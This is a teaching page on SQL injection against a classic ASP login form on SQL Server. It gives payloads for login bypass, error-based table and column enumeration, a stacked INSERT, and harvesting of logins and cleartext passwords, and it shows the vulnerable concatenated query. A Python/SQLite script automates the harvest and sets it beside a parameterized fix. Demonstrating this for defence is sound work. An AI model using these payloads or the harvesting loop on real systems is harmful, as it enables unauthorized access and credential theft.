Record Editor

This web page is intended as a demonstration of SQL injection attacks against a classic ASP login form backed by SQL Server.

To use this page, copy and paste each of the SQL statements given below into the Login text box (leave the Password box empty; every statement ends in -- so the password clause is commented out) and click "Login".

Unauthorized Access

Description                                  SQL statement
Login with a known login (but no password)   pardue'--
Login as first person in table               ' or 1=1--
Login as fictional user                      ' union select 1, 'somebody', 'somepassword', 1--

In each case the -- starts a Transact-SQL comment, so the rest of the generated query, including the AND Password = '...' clause, is ignored. The union statement supplies four values because the page selects all four columns of tblSqlUser and a UNION must match that column count; the row it returns is accepted as a logged-in user even though it exists in no table.

Note: In IE, turn off "Show friendly HTTP error messages" on the Advanced tab of Internet Options in order to see the ASP exception; the error-based steps below depend on reading the SQL Server error text that the page returns.

Probing table structure and data values with SQL Server error messages

Description and SQL statements

1. Establish the table name and column names of the authentication table
     ' having 1=1--
     ' group by tblSqlUser.eid having 1=1--
     ' group by tblSqlUser.eid, tblSqlUser.login having 1=1--
     ' group by tblSqlUser.eid, tblSqlUser.login, tblSqlUser.password having 1=1--
     ' group by tblSqlUser.eid, tblSqlUser.login, tblSqlUser.password, tblSqlUser.cr_tm having 1=1--
   A HAVING clause without a matching GROUP BY makes SQL Server complain that the first column in the select list (tblSqlUser.Eid) is not contained in an aggregate function or the GROUP BY clause; the error text gives the table name and the column name. Adding that column to the GROUP BY makes the error move on to the next column. Continue until the statement produces an unsuccessful login instead of an error: all columns have then been enumerated, which confirms there is only one authentication table in the query and gives the order of its columns.
   
2. Identify data types
     ' union select sum(eid), 1,1,1 from tblSqlUser--
     ' union select sum(login), 1,1,1 from tblSqlUser--
     ' union select sum(password), 1,1,1 from tblSqlUser--
     ' union select sum(cr_tm), 1,1,1 from tblSqlUser--
   sum() is defined only for numeric types. Applied to any other column, SQL Server raises an error saying that the operand data type (nvarchar, datetime, ...) is invalid for the sum operator, which names the type of that column; only sum(eid) runs without a type error, so Eid is numeric. Result: Int, Nvarchar, Nvarchar, DateTime respectively.
   
3. Insert a new user into the authentication table (stacked query; fails in this demo because INSERT permission has been revoked from the application's database account)
     '; insert into tblSqlUser values('newuser', 'mypass', 'datetime')--
   The ; ends the SELECT and starts a second statement in the same batch. With an account that still holds INSERT permission, this would add a login of the attacker's choosing.
   
4. Harvest logins
     ' union select min(login), 1,1,1 from tblSqlUser where login > 'a'--
     ' union select min(login), 1,1,1 from tblSqlUser where login > 'Aline'--
     ' union select min(login), 1,1,1 from tblSqlUser where login > 'khaley'--
     ' union select min(login), 1,1,1 from tblSqlUser where login > 'ksaifullah'--
     ' union select min(login), 1,1,1 from tblSqlUser where login > 'pardue'--
   The first column of SELECT * FROM tblSqlUser is Eid (int). SQL Server resolves a UNION to the higher-precedence type, so it tries to convert the selected login to int and fails, and the error message quotes the nvarchar value it could not convert, which is the login. Each statement returns the smallest login greater than the previous one, so repeating with the last harvested value walks the whole table in order; when no larger login exists min() returns NULL, the conversion error no longer appears, and the list is complete.
   
5. Harvest passwords
     ' union select password, 1,1,1 from tblSqlUser where login = 'Aline'--
     ' union select password, 1,1,1 from tblSqlUser where login = 'khaley'--
     ' union select password, 1,1,1 from tblSqlUser where login = 'ksaifullah'--
     ' union select password, 1,1,1 from tblSqlUser where login = 'pardue'--
   Same channel as step 4: the password is placed in the int column, the conversion fails, and the error message quotes the cleartext password. The passwords are stored in the clear, so no cracking step is needed.


tblSqlUser

Eid  Login       Password              Cr_tm
1    pardue      somethingeasytoguess  2005-11-20 10:40
2    aline       r123377               2005-11-22 11:30
3    khaley      4rjuj5j               2005-11-22 11:50
4    ksaifullah  4fvgt6                2005-11-23 01:22

ASP script (VBScript) that builds the query string

' The query text is assembled by string concatenation from the request fields,
' so a single quote or -- in txtLogin or txtPassword is parsed as SQL, not as data.
Set rsUser = Server.CreateObject ("ADODB.Recordset")
SQLexpression="SELECT * FROM tblSqlUser WHERE Login = '" & request("txtLogin") & "' AND Password = '" & request("txtPassword") & "';"
' adCmdText makes ADO send the string to SQL Server as-is; any SQL error
' comes back as an ASP exception, which is what the probing steps above read.
rsUser.Open SQLexpression, DatabaseConnection, adOpenDynamic, adLockOptimistic, adCmdText
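The following is an added example, not code from the demo page: it rebuilds the ASP query construction in Python over an in-memory SQLite copy of tblSqlUser, runs the three "Unauthorized Access" payloads and the login/password harvesting sequence against it, and puts a parameterized query beside the vulnerable one. The table contents are the four rows shown above; the function names are the example's own. SQLite is a stand-in for SQL Server, so the error-message leak is not reproduced: the harvested value comes back as the first column of the record the union returns, which the Record Editor would display.

```python
import sqlite3

# Constructed copy of the demo's tblSqlUser (the same four rows shown on this page).
USERS = [
    (1, "pardue", "somethingeasytoguess", "2005-11-20 10:40"),
    (2, "aline", "r123377", "2005-11-22 11:30"),
    (3, "khaley", "4rjuj5j", "2005-11-22 11:50"),
    (4, "ksaifullah", "4fvgt6", "2005-11-23 01:22"),
]


def make_db():
    """In-memory SQLite stand-in for the SQL Server table the ASP page queries."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE tblSqlUser (Eid INTEGER, Login TEXT, Password TEXT, Cr_tm TEXT)")
    con.executemany("INSERT INTO tblSqlUser VALUES (?, ?, ?, ?)", USERS)
    return con


def vulnerable_login(con, login, password):
    """Same construction as the ASP script: the query text is concatenated from the
    request fields, so a quote or -- in the input is parsed as SQL, not as data.
    Returns the first record of the result (what the Record Editor would display)
    or None when the login fails."""
    sql = ("SELECT * FROM tblSqlUser WHERE Login = '" + login
           + "' AND Password = '" + password + "';")
    rows = con.execute(sql).fetchall()
    return rows[0] if rows else None


def safe_login(con, login, password):
    """Hardened form: the SQL text is a fixed string and the values are passed as
    bind parameters, so the same payloads are compared literally against Login."""
    sql = "SELECT * FROM tblSqlUser WHERE Login = ? AND Password = ?"
    rows = con.execute(sql, (login, password)).fetchall()
    return rows[0] if rows else None


def harvest_logins(con):
    """Drives the page's 'Harvest logins' sequence through vulnerable_login():
    each payload asks for the smallest Login greater than the last one seen and
    stops when min() returns NULL. On SQL Server the value surfaces in the
    int-conversion error; SQLite raises no such error, so here it arrives as the
    first column of the record the union returns."""
    found, last = [], ""
    while True:
        payload = ("' union select min(Login), 1, 1, 1 from tblSqlUser "
                   "where Login > '" + last + "'--")
        row = vulnerable_login(con, payload, "")
        if row is None or row[0] is None:
            return found
        found.append(row[0])
        last = row[0]


def harvest_password(con, login):
    """The page's 'Harvest passwords' step for one login, through the same channel."""
    payload = ("' union select Password, 1, 1, 1 from tblSqlUser "
               "where Login = '" + login + "'--")
    row = vulnerable_login(con, payload, "")
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for payload in ("pardue'--", "' or 1=1--",
                    "' union select 1, 'somebody', 'somepassword', 1--"):
        print(repr(payload), "->", vulnerable_login(db, payload, ""),
              "| parameterized:", safe_login(db, payload, ""))
    print("logins:", harvest_logins(db))
    print("password for aline:", harvest_password(db, "aline"))
```

Every payload that logs in through vulnerable_login() returns None from safe_login(), because with bind parameters the quote and the -- are just characters in a login name that does not exist. Fixing the ASP page the same way means an ADODB.Command with Parameters instead of the concatenated SQLexpression, and, independently, not storing passwords in the clear.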